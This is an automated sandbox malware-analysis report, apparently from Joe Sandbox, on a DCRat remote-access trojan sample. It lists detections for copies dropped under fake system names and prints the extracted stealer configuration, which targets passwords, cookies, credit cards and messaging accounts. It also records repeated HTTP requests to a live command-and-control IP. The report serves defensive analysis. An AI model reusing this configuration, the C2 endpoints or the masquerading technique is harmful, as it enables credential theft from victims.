            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat | Avira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
            Source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"p\":\"~\",\"B\":\"$\",\"3\":\"*\",\"J\":\"#\",\"c\":\",\",\"i\":\"_\",\"m\":\"!\",\"U\":\"^\",\"V\":\" \",\"b\":\"(\",\"2\":\"<\",\"F\":\">\",\"I\":\".\",\"s\":\"-\",\"M\":\"|\",\"C\":\";\",\"R\":\")\",\"a\":\"@\",\"1\":\"&\",\"6\":\"`\",\"G\":\"%\"}", "PCRT": "{\"v\":\"%\",\"0\":\"!\",\"Q\":\",\",\"Y\":\"|\",\"U\":\"^\",\"F\":\"&\",\"d\":\"`\",\"R\":\"*\",\"K\":\"$\",\"V\":\"(\",\"Z\":\"~\",\"x\":\" \",\"3\":\"-\",\"B\":\";\",\"G\":\">\",\"I\":\"<\",\"X\":\"@\",\"W\":\")\",\"t\":\"#\",\"N\":\".\",\"4\":\"_\"}", "TAG": "m", "MUTEX": "DCR_MUTEX-WVn4oNZYFAP9yGpaqtNX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe; ReversingLabs: Detection: 78%
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe; ReversingLabs: Detection: 78%
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe; ReversingLabs: Detection: 78%
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe; ReversingLabs: Detection: 78%
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe; ReversingLabs: Detection: 78%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe; ReversingLabs: Detection: 78%
            Source: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe; ReversingLabs: Detection: 78%
            Source: XPC5PMKegV.exe; ReversingLabs: Detection: 78%
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe; Joe Sandbox ML: detected
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe; Joe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe; Joe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe; Joe Sandbox ML: detected
            Source: XPC5PMKegV.exe; Joe Sandbox ML: detected
            Source: XPC5PMKegV.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; Directory created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382
            Source: XPC5PMKegV.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; File opened: C:\Users\user
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe; File opened: C:\Users\user\AppData\Local\Temp

            Networking

            Source: Network traffic; Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51888 -> 92.63.98.227:80
            Source: Joe Sandbox View; ASN Name: THEFIRST-ASRU THEFIRST-ASRU
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1 Accept: */* Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1 Accept: */* Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 92.63.98.227 Connection: Keep-Alive
            Source: unknown TCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1 Accept: */* Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1 Accept: */* Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1 Accept: */* Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1 Accept: */* Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1 Accept: */* Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 92.63.98.227 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1 Accept: */* Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 92.63.98.227 Connection: Keep-Alive
            Source: StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.63.98.227
